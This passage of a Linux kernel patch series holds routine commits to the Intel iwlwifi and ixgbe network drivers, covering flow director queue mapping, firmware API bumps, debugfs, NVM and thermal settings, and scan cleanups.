pci_disable_device(pdev); out_no_pci: - kfree(trans); -out: + iwl_trans_free(trans); return ERR_PTR(err); } From 7aac84259656c4f2dd805223659067b1504ed619 Mon Sep 17 00:00:00 2001 From: John Fastabend Date: Tue, 26 May 2015 08:23:33 -0700 Subject: [PATCH 363/872] ixgbe: Allow flow director to use entire queue space Flow director is exported to user space using the ethtool ntuple support. However, currently it only supports steering traffic to a subset of the queues in use by the hardware. This change allows flow director to specify queues that have been assigned to virtual functions by partitioning the ring_cookie into a 8bit VF specifier followed by 32bit queue index. At the moment we don't have any ethernet drivers with more than 2^32 queues on a single function as best I can tell and nor do I expect this to happen anytime soon. This way the ring_cookie's normal use for specifying a queue on a specific PCI function continues to work as expected. CC: Alex Duyck Signed-off-by: John Fastabend Tested-by: Krishneil Singh Signed-off-by: Jeff Kirsher --- .../net/ethernet/intel/ixgbe/ixgbe_ethtool.c | 34 +++++++++++++------ 1 file changed, 24 insertions(+), 10 deletions(-) diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c index 9f6fb19062a0..9a1d0f142b09 100644 --- a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c +++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c @@ -2594,18 +2594,35 @@ static int ixgbe_add_ethtool_fdir_entry(struct ixgbe_adapter *adapter, struct ixgbe_hw *hw = &adapter->hw; struct ixgbe_fdir_filter *input; union ixgbe_atr_input mask; + u8 queue; int err; if (!(adapter->flags & IXGBE_FLAG_FDIR_PERFECT_CAPABLE)) return -EOPNOTSUPP; - /* - * Don't allow programming if the action is a queue greater than - * the number of online Rx queues. + /* ring_cookie is a masked into a set of queues and ixgbe pools or + * we use the drop index. */ - if ((fsp->ring_cookie != RX_CLS_FLOW_DISC) && - (fsp->ring_cookie >= adapter->num_rx_queues)) - return -EINVAL; + if (fsp->ring_cookie == RX_CLS_FLOW_DISC) { + queue = IXGBE_FDIR_DROP_QUEUE; + } else { + u32 ring = ethtool_get_flow_spec_ring(fsp->ring_cookie); + u8 vf = ethtool_get_flow_spec_ring_vf(fsp->ring_cookie); + + if (!vf && (ring >= adapter->num_rx_queues)) + return -EINVAL; + else if (vf && + ((vf > adapter->num_vfs) || + ring >= adapter->num_rx_queues_per_pool)) + return -EINVAL; + + /* Map the ring onto the absolute queue index */ + if (!vf) + queue = adapter->rx_ring[ring]->reg_idx; + else + queue = ((vf - 1) * + adapter->num_rx_queues_per_pool) + ring; + } /* Don't allow indexes to exist outside of available space */ if (fsp->location >= ((1024 << adapter->fdir_pballoc) - 2)) { @@ -2683,10 +2700,7 @@ static int ixgbe_add_ethtool_fdir_entry(struct ixgbe_adapter *adapter, /* program filters to filter memory */ err = ixgbe_fdir_write_perfect_filter_82599(hw, - &input->filter, input->sw_idx, - (input->action == IXGBE_FDIR_DROP_QUEUE) ? - IXGBE_FDIR_DROP_QUEUE : - adapter->rx_ring[input->action]->reg_idx); + &input->filter, input->sw_idx, queue); if (err) goto err_out_w_lock; From 1899e114822273636fb96c76a9567cf9cfc1dba6 Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Tue, 26 May 2015 11:59:53 +0300 Subject: [PATCH 364/872] iwlwifi: bump API to 14 The iwlmvm driver is now able to handle -14.ucode. Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-7000.c | 2 +- drivers/net/wireless/iwlwifi/iwl-8000.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-7000.c b/drivers/net/wireless/iwlwifi/iwl-7000.c index 0afe4946e4f9..b40b385ee0df 100644 --- a/drivers/net/wireless/iwlwifi/iwl-7000.c +++ b/drivers/net/wireless/iwlwifi/iwl-7000.c @@ -69,7 +69,7 @@ #include "iwl-agn-hw.h" /* Highest firmware API version supported */ -#define IWL7260_UCODE_API_MAX 13 +#define IWL7260_UCODE_API_MAX 14 /* Oldest version we won't warn about */ #define IWL7260_UCODE_API_OK 12 diff --git a/drivers/net/wireless/iwlwifi/iwl-8000.c b/drivers/net/wireless/iwlwifi/iwl-8000.c index ce6321b7d241..f9770b7922fc 100644 --- a/drivers/net/wireless/iwlwifi/iwl-8000.c +++ b/drivers/net/wireless/iwlwifi/iwl-8000.c @@ -69,7 +69,7 @@ #include "iwl-agn-hw.h" /* Highest firmware API version supported */ -#define IWL8000_UCODE_API_MAX 13 +#define IWL8000_UCODE_API_MAX 14 /* Oldest version we won't warn about */ #define IWL8000_UCODE_API_OK 12 From 47dbab263db205f6bbc6bd10ba45cfb4ad75ec2f Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Tue, 28 Apr 2015 21:32:47 +0300 Subject: [PATCH 365/872] iwlwifi: pcie: simplify return value This was spot by Coccinelle. Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/pcie/trans.c | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/pcie/trans.c b/drivers/net/wireless/iwlwifi/pcie/trans.c index 5c523a7d54f7..a341ed90f8a8 100644 --- a/drivers/net/wireless/iwlwifi/pcie/trans.c +++ b/drivers/net/wireless/iwlwifi/pcie/trans.c @@ -973,12 +973,8 @@ static int iwl_pcie_load_given_ucode_8000(struct iwl_trans *trans, return ret; /* load to FW the binary sections of CPU2 */ - ret = iwl_pcie_load_cpu_sections_8000(trans, image, 2, - &first_ucode_section); - if (ret) - return ret; - - return 0; + return iwl_pcie_load_cpu_sections_8000(trans, image, 2, + &first_ucode_section); } static int iwl_trans_pcie_start_fw(struct iwl_trans *trans, From 25870cb75096cbfa7079b200e71e359cf21a9a82 Mon Sep 17 00:00:00 2001 From: Matti Gottlieb Date: Mon, 4 May 2015 09:34:37 +0300 Subject: [PATCH 366/872] iwlwifi: mvm: Add debugfs entry for Tx power limit Add debugfs entry for showing the different Tx power restrictions that are caused due to various reasons. Signed-off-by: Matti Gottlieb Signed-off-by: Emmanuel Grumbach --- .../net/wireless/iwlwifi/mvm/debugfs-vif.c | 21 +++++++++++++++++-- 1 file changed, 19 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/debugfs-vif.c b/drivers/net/wireless/iwlwifi/mvm/debugfs-vif.c index 5f37eab5008d..5c8a65de0e77 100644 --- a/drivers/net/wireless/iwlwifi/mvm/debugfs-vif.c +++ b/drivers/net/wireless/iwlwifi/mvm/debugfs-vif.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -190,6 +190,21 @@ static ssize_t iwl_dbgfs_pm_params_write(struct ieee80211_vif *vif, char *buf, return ret ?: count; } +static ssize_t iwl_dbgfs_tx_pwr_lmt_read(struct file *file, + char __user *user_buf, + size_t count, loff_t *ppos) +{ + struct ieee80211_vif *vif = file->private_data; + char buf[64]; + int bufsz = sizeof(buf); + int pos; + + pos = scnprintf(buf, bufsz, "bss limit = %d\n", + vif->bss_conf.txpower); + + return simple_read_from_buffer(user_buf, count, ppos, buf, pos); +} + static ssize_t iwl_dbgfs_pm_params_read(struct file *file, char __user *user_buf, size_t count, loff_t *ppos) @@ -607,6 +622,7 @@ static ssize_t iwl_dbgfs_rx_phyinfo_read(struct file *file, } while (0) MVM_DEBUGFS_READ_FILE_OPS(mac_params); +MVM_DEBUGFS_READ_FILE_OPS(tx_pwr_lmt); MVM_DEBUGFS_READ_WRITE_FILE_OPS(pm_params, 32); MVM_DEBUGFS_READ_WRITE_FILE_OPS(bf_params, 256); MVM_DEBUGFS_READ_WRITE_FILE_OPS(low_latency, 10); @@ -641,6 +657,7 @@ void iwl_mvm_vif_dbgfs_register(struct iwl_mvm *mvm, struct ieee80211_vif *vif) MVM_DEBUGFS_ADD_FILE_VIF(pm_params, mvmvif->dbgfs_dir, S_IWUSR | S_IRUSR); + MVM_DEBUGFS_ADD_FILE_VIF(tx_pwr_lmt, mvmvif->dbgfs_dir, S_IRUSR); MVM_DEBUGFS_ADD_FILE_VIF(mac_params, mvmvif->dbgfs_dir, S_IRUSR); MVM_DEBUGFS_ADD_FILE_VIF(low_latency, mvmvif->dbgfs_dir, S_IRUSR | S_IWUSR); From 4fb06283edb573bee139cf358173d3801520c692 Mon Sep 17 00:00:00 2001 From: Eran Harary Date: Sun, 19 Apr 2015 10:05:18 +0300 Subject: [PATCH 367/872] iwlwifi: 8000: fallback to default NVM file Set a default NVM in case the userspace specifies a file that doesn't match the hardware version. This allows not to change the boot scripts when someone replaces the device with a newer hardware step. Signed-off-by: Eran Harary Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-8000.c | 46 ++++++++++++------------- drivers/net/wireless/iwlwifi/mvm/nvm.c | 8 ++--- drivers/net/wireless/iwlwifi/mvm/ops.c | 17 ++++----- 3 files changed, 33 insertions(+), 38 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-8000.c b/drivers/net/wireless/iwlwifi/iwl-8000.c index f9770b7922fc..75881f94648c 100644 --- a/drivers/net/wireless/iwlwifi/iwl-8000.c +++ b/drivers/net/wireless/iwlwifi/iwl-8000.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2014 Intel Mobile Communications GmbH + * Copyright(c) 2014 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2014 Intel Mobile Communications GmbH + * Copyright(c) 2014 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -122,24 +122,26 @@ static const struct iwl_ht_params iwl8000_ht_params = { .ht40_bands = BIT(IEEE80211_BAND_2GHZ) | BIT(IEEE80211_BAND_5GHZ), }; -#define IWL_DEVICE_8000 \ - .ucode_api_max = IWL8000_UCODE_API_MAX, \ - .ucode_api_ok = IWL8000_UCODE_API_OK, \ - .ucode_api_min = IWL8000_UCODE_API_MIN, \ - .device_family = IWL_DEVICE_FAMILY_8000, \ - .max_inst_size = IWL60_RTC_INST_SIZE, \ - .max_data_size = IWL60_RTC_DATA_SIZE, \ - .base_params = &iwl8000_base_params, \ - .led_mode = IWL_LED_RF_STATE, \ - .nvm_hw_section_num = NVM_HW_SECTION_NUM_FAMILY_8000, \ - .d0i3 = true, \ - .non_shared_ant = ANT_A, \ - .dccm_offset = IWL8260_DCCM_OFFSET, \ - .dccm_len = IWL8260_DCCM_LEN, \ - .dccm2_offset = IWL8260_DCCM2_OFFSET, \ - .dccm2_len = IWL8260_DCCM2_LEN, \ - .smem_offset = IWL8260_SMEM_OFFSET, \ - .smem_len = IWL8260_SMEM_LEN +#define IWL_DEVICE_8000 \ + .ucode_api_max = IWL8000_UCODE_API_MAX, \ + .ucode_api_ok = IWL8000_UCODE_API_OK, \ + .ucode_api_min = IWL8000_UCODE_API_MIN, \ + .device_family = IWL_DEVICE_FAMILY_8000, \ + .max_inst_size = IWL60_RTC_INST_SIZE, \ + .max_data_size = IWL60_RTC_DATA_SIZE, \ + .base_params = &iwl8000_base_params, \ + .led_mode = IWL_LED_RF_STATE, \ + .nvm_hw_section_num = NVM_HW_SECTION_NUM_FAMILY_8000, \ + .d0i3 = true, \ + .non_shared_ant = ANT_A, \ + .dccm_offset = IWL8260_DCCM_OFFSET, \ + .dccm_len = IWL8260_DCCM_LEN, \ + .dccm2_offset = IWL8260_DCCM2_OFFSET, \ + .dccm2_len = IWL8260_DCCM2_LEN, \ + .smem_offset = IWL8260_SMEM_OFFSET, \ + .smem_len = IWL8260_SMEM_LEN, \ + .default_nvm_file_B_step = DEFAULT_NVM_FILE_FAMILY_8000B, \ + .default_nvm_file_C_step = DEFAULT_NVM_FILE_FAMILY_8000C const struct iwl_cfg iwl8260_2n_cfg = { .name = "Intel(R) Dual Band Wireless N 8260", @@ -177,8 +179,6 @@ const struct iwl_cfg iwl8260_2ac_sdio_cfg = { .ht_params = &iwl8000_ht_params, .nvm_ver = IWL8000_NVM_VERSION, .nvm_calib_ver = IWL8000_TX_POWER_VERSION, - .default_nvm_file_B_step = DEFAULT_NVM_FILE_FAMILY_8000B, - .default_nvm_file_C_step = DEFAULT_NVM_FILE_FAMILY_8000C, .max_rx_agg_size = MAX_RX_AGG_SIZE_8260_SDIO, .disable_dummy_notification = true, .max_ht_ampdu_exponent = MAX_HT_AMPDU_EXPONENT_8260_SDIO, @@ -192,8 +192,6 @@ const struct iwl_cfg iwl4165_2ac_sdio_cfg = { .ht_params = &iwl8000_ht_params, .nvm_ver = IWL8000_NVM_VERSION, .nvm_calib_ver = IWL8000_TX_POWER_VERSION, - .default_nvm_file_B_step = DEFAULT_NVM_FILE_FAMILY_8000B, - .default_nvm_file_C_step = DEFAULT_NVM_FILE_FAMILY_8000C, .max_rx_agg_size = MAX_RX_AGG_SIZE_8260_SDIO, .bt_shared_single_ant = true, .disable_dummy_notification = true, diff --git a/drivers/net/wireless/iwlwifi/mvm/nvm.c b/drivers/net/wireless/iwlwifi/mvm/nvm.c index 87b2a30a2308..47014241bc3c 100644 --- a/drivers/net/wireless/iwlwifi/mvm/nvm.c +++ b/drivers/net/wireless/iwlwifi/mvm/nvm.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -583,9 +583,9 @@ int iwl_nvm_init(struct iwl_mvm *mvm, bool read_nvm_from_nic) kfree(nvm_buffer); } - /* load external NVM if configured */ + /* Only if PNVM selected in the mod param - load external NVM */ if (mvm->nvm_file_name) { - /* read External NVM file - take the default */ + /* read External NVM file from the mod param */ ret = iwl_mvm_read_external_nvm(mvm); if (ret) { /* choose the nvm_file name according to the diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 02028bcb3ff6..534a9fd8fcbd 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -517,15 +517,12 @@ iwl_op_mode_mvm_start(struct iwl_trans *trans, const struct iwl_cfg *cfg, min_backoff = calc_min_backoff(trans, cfg); iwl_mvm_tt_initialize(mvm, min_backoff); - /* set the nvm_file_name according to priority */ - if (iwlwifi_mod_params.nvm_file) { + + if (iwlwifi_mod_params.nvm_file) mvm->nvm_file_name = iwlwifi_mod_params.nvm_file; - } else if (trans->cfg->device_family == IWL_DEVICE_FAMILY_8000) { - if (CSR_HW_REV_STEP(trans->hw_rev) == SILICON_B_STEP) - mvm->nvm_file_name = mvm->cfg->default_nvm_file_B_step; - else - mvm->nvm_file_name = mvm->cfg->default_nvm_file_C_step; - } + else + IWL_DEBUG_EEPROM(mvm->trans->dev, + "working without external nvm file\n"); if (WARN(cfg->no_power_up_nic_in_init && !mvm->nvm_file_name, "not allowing power-up and not having nvm_file\n")) From 8ce7db48645e6def197e038278b702381075a0de Mon Sep 17 00:00:00 2001 From: Ido Yariv Date: Mon, 4 May 2015 23:01:46 -0400 Subject: [PATCH 368/872] iwlwifi: update thermal throttling values for 8000 devices 8000 devices have different thermal throttling values from previous generations. Signed-off-by: Ido Yariv Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-8000.c | 24 +++++++++++++++++++++++- 1 file changed, 23 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-8000.c b/drivers/net/wireless/iwlwifi/iwl-8000.c index 75881f94648c..5dca838a3e8b 100644 --- a/drivers/net/wireless/iwlwifi/iwl-8000.c +++ b/drivers/net/wireless/iwlwifi/iwl-8000.c @@ -122,6 +122,27 @@ static const struct iwl_ht_params iwl8000_ht_params = { .ht40_bands = BIT(IEEE80211_BAND_2GHZ) | BIT(IEEE80211_BAND_5GHZ), }; +static const struct iwl_tt_params iwl8000_tt_params = { + .ct_kill_entry = 115, + .ct_kill_exit = 93, + .ct_kill_duration = 5, + .dynamic_smps_entry = 111, + .dynamic_smps_exit = 107, + .tx_protection_entry = 112, + .tx_protection_exit = 105, + .tx_backoff = { + {.temperature = 110, .backoff = 200}, + {.temperature = 111, .backoff = 600}, + {.temperature = 112, .backoff = 1200}, + {.temperature = 113, .backoff = 2000}, + {.temperature = 114, .backoff = 4000}, + }, + .support_ct_kill = true, + .support_dynamic_smps = true, + .support_tx_protection = true, + .support_tx_backoff = true, +}; + #define IWL_DEVICE_8000 \ .ucode_api_max = IWL8000_UCODE_API_MAX, \ .ucode_api_ok = IWL8000_UCODE_API_OK, \ @@ -141,7 +162,8 @@ static const struct iwl_ht_params iwl8000_ht_params = { .smem_offset = IWL8260_SMEM_OFFSET, \ .smem_len = IWL8260_SMEM_LEN, \ .default_nvm_file_B_step = DEFAULT_NVM_FILE_FAMILY_8000B, \ - .default_nvm_file_C_step = DEFAULT_NVM_FILE_FAMILY_8000C + .default_nvm_file_C_step = DEFAULT_NVM_FILE_FAMILY_8000C, \ + .thermal_params = &iwl8000_tt_params const struct iwl_cfg iwl8260_2n_cfg = { .name = "Intel(R) Dual Band Wireless N 8260", From 3db93420f780d39dbef22ef6a5485aac009e02dc Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Wed, 6 May 2015 14:56:51 +0200 Subject: [PATCH 369/872] iwlwifi: mvm: advertise randomised netdetect MAC address According to the nl80211 documentation, we can neither advertise scheduled scan nor netdetect address randomisation. However, all the products that currently require this don't have a need for the full randomisation. Therefore, advertise the feature anyway which results in host- based randomisation, done whenever the system suspends. This is sufficient for the platforms currently requiring this feature. If we ever extend this in the future to do full randomisation in the firmware, then certainly this will still be sufficient for the current requirements, so it doesn't make a lot of sense to split the feature bits. Signed-off-by: Johannes Berg Reviewed-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index 677143c79fa6..d13138e51686 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -452,7 +452,8 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) hw->flags |= IEEE80211_SINGLE_HW_SCAN_ON_ALL_BANDS; hw->wiphy->features |= NL80211_FEATURE_SCHED_SCAN_RANDOM_MAC_ADDR | - NL80211_FEATURE_SCAN_RANDOM_MAC_ADDR; + NL80211_FEATURE_SCAN_RANDOM_MAC_ADDR | + NL80211_FEATURE_ND_RANDOM_MAC_ADDR; hw->sta_data_size = sizeof(struct iwl_mvm_sta); hw->vif_data_size = sizeof(struct iwl_mvm_vif); From d643c432223270844c4fd8dcfaec85404d36bde7 Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Thu, 7 May 2015 14:47:50 +0200 Subject: [PATCH 370/872] iwlwifi: mvm: handle device start failure correctly If the device fails to start correctly prior to loading the regular runtime firmware (after having run the INIT firmware), treat that error correctly by actually checking the return value of _iwl_trans_start_hw() and stopping the device again before returning an error. Reported-by: Dan Carpenter Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/fw.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/fw.c b/drivers/net/wireless/iwlwifi/mvm/fw.c index 0601445599f2..2f76fb23249a 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw.c +++ b/drivers/net/wireless/iwlwifi/mvm/fw.c @@ -662,9 +662,9 @@ int iwl_mvm_up(struct iwl_mvm *mvm) * device that are triggered by the INIT firwmare (MFUART). */ _iwl_trans_stop_device(mvm->trans, false); - _iwl_trans_start_hw(mvm->trans, false); + ret = _iwl_trans_start_hw(mvm->trans, false); if (ret) - return ret; + goto error; } if (iwlmvm_mod_params.init_dbg) From fa7878e76928a2100ca56295fc1ccfce063a842e Mon Sep 17 00:00:00 2001 From: Andrei Otcheretianski Date: Tue, 5 May 2015 09:28:16 +0300 Subject: [PATCH 371/872] iwlwifi: mvm: Configure agg. queue before assigning it to STA In order to imeplement the extended VI session feature for Miracast, the FW requires to detect the VI queue. The detection of the VI queue is done when it is assigned to a STA with ADD_STA command, so by this time the FW expects the queue to be already configured (mapped to VI AC and aggregation enabled). Previously, the queue configuration was done after STA modificaton which broke the extended VI session feature and resulted in higher latencies. Fix this by calling iwl_mvm_enable_agg_txq before station modification. Signed-off-by: Andrei Otcheretianski Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/sta.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/sta.c b/drivers/net/wireless/iwlwifi/mvm/sta.c index 1845b79487c8..d68dc697a4a0 100644 --- a/drivers/net/wireless/iwlwifi/mvm/sta.c +++ b/drivers/net/wireless/iwlwifi/mvm/sta.c @@ -5,8 +5,8 @@ * * GPL LICENSE SUMMARY * - * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2012 - 2015 Intel Corporation. All rights reserved. + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -31,8 +31,8 @@ * * BSD LICENSE * - * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2012 - 2015 Intel Corporation. All rights reserved. + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -1000,13 +1000,13 @@ int iwl_mvm_sta_tx_agg_oper(struct iwl_mvm *mvm, struct ieee80211_vif *vif, fifo = iwl_mvm_ac_to_tx_fifo[tid_to_mac80211_ac[tid]]; + iwl_mvm_enable_agg_txq(mvm, queue, fifo, mvmsta->sta_id, tid, + buf_size, ssn, wdg_timeout); + ret = iwl_mvm_sta_tx_agg(mvm, sta, tid, queue, true); if (ret) return -EIO; - iwl_mvm_enable_agg_txq(mvm, queue, fifo, mvmsta->sta_id, tid, - buf_size, ssn, wdg_timeout); - /* * Even though in theory the peer could have different * aggregation reorder buffer sizes for different sessions, From 9345c5958131078db7b51686505a37f7455f75c8 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 10:10:57 +0300 Subject: [PATCH 372/872] iwlwifi: mvm: remove the UMAC specific scan types There is no need to have separate definitions for the UMAC scan types, since they are the same as the LMAC types. Remove UMAC scan types and use the generic ones instead. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 47 +++++++++---------------- 1 file changed, 17 insertions(+), 30 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index e54432aad2e5..7777d56cbb60 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -101,13 +101,7 @@ struct iwl_mvm_scan_params { } schedule[2]; }; -enum iwl_umac_scan_uid_type { - IWL_UMAC_SCAN_UID_REG_SCAN = BIT(0), - IWL_UMAC_SCAN_UID_SCHED_SCAN = BIT(1), -}; - -static int iwl_umac_scan_stop(struct iwl_mvm *mvm, - enum iwl_umac_scan_uid_type type, bool notify); +static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type, bool notify); static u8 iwl_mvm_scan_rx_ant(struct iwl_mvm *mvm) { @@ -588,8 +582,7 @@ int iwl_mvm_scan_offload_stop(struct iwl_mvm *mvm, bool notify) lockdep_assert_held(&mvm->mutex); if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - return iwl_umac_scan_stop(mvm, IWL_UMAC_SCAN_UID_SCHED_SCAN, - notify); + return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED, notify); /* FIXME: For now we only check if no scan is set here, since * we only support LMAC in this flow and it doesn't support @@ -917,8 +910,7 @@ static int iwl_mvm_scan_lmac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, int iwl_mvm_cancel_scan(struct iwl_mvm *mvm) { if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - return iwl_umac_scan_stop(mvm, IWL_UMAC_SCAN_UID_REG_SCAN, - true); + return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); if (!(mvm->scan_status & IWL_MVM_SCAN_REGULAR)) return 0; @@ -937,7 +929,7 @@ int iwl_mvm_cancel_scan(struct iwl_mvm *mvm) struct iwl_umac_scan_done { struct iwl_mvm *mvm; - enum iwl_umac_scan_uid_type type; + int type; }; static int rate_to_scan_rate_flag(unsigned int rate) @@ -1064,8 +1056,7 @@ static int iwl_mvm_find_free_scan_uid(struct iwl_mvm *mvm) return iwl_mvm_find_scan_uid(mvm, 0); } -static bool iwl_mvm_find_scan_type(struct iwl_mvm *mvm, - enum iwl_umac_scan_uid_type type) +static bool iwl_mvm_find_scan_type(struct iwl_mvm *mvm, int type) { int i; @@ -1076,8 +1067,7 @@ static bool iwl_mvm_find_scan_type(struct iwl_mvm *mvm, return false; } -static int iwl_mvm_find_first_scan(struct iwl_mvm *mvm, - enum iwl_umac_scan_uid_type type) +static int iwl_mvm_find_first_scan(struct iwl_mvm *mvm, int type) { int i; @@ -1088,8 +1078,7 @@ static int iwl_mvm_find_first_scan(struct iwl_mvm *mvm, return i; } -static u32 iwl_generate_scan_uid(struct iwl_mvm *mvm, - enum iwl_umac_scan_uid_type type) +static u32 iwl_generate_scan_uid(struct iwl_mvm *mvm, int type) { u32 uid; @@ -1201,9 +1190,9 @@ static int iwl_mvm_scan_umac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, iwl_mvm_scan_umac_dwell(mvm, cmd, params); if (n_iterations == 1) - uid = iwl_generate_scan_uid(mvm, IWL_UMAC_SCAN_UID_REG_SCAN); + uid = iwl_generate_scan_uid(mvm, IWL_MVM_SCAN_REGULAR); else - uid = iwl_generate_scan_uid(mvm, IWL_UMAC_SCAN_UID_SCHED_SCAN); + uid = iwl_generate_scan_uid(mvm, IWL_MVM_SCAN_SCHED); mvm->scan_uid[uid_idx] = uid; cmd->uid = cpu_to_le32(uid); @@ -1478,7 +1467,7 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_umac_scan_complete *notif = (void *)pkt->data; u32 uid = __le32_to_cpu(notif->uid); - bool sched = !!(uid & IWL_UMAC_SCAN_UID_SCHED_SCAN); + bool sched = !!(uid & IWL_MVM_SCAN_SCHED); int uid_idx = iwl_mvm_find_scan_uid(mvm, uid); /* @@ -1505,7 +1494,7 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, notif->status == IWL_SCAN_OFFLOAD_ABORTED); iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - } else if (!iwl_mvm_find_scan_type(mvm, IWL_UMAC_SCAN_UID_SCHED_SCAN)) { + } else if (!iwl_mvm_find_scan_type(mvm, IWL_MVM_SCAN_SCHED)) { ieee80211_sched_scan_stopped(mvm->hw); } else { IWL_DEBUG_SCAN(mvm, "Another sched scan is running\n"); @@ -1556,8 +1545,7 @@ static int iwl_umac_scan_abort_one(struct iwl_mvm *mvm, u32 uid) return iwl_mvm_send_cmd_pdu(mvm, SCAN_ABORT_UMAC, 0, sizeof(cmd), &cmd); } -static int iwl_umac_scan_stop(struct iwl_mvm *mvm, 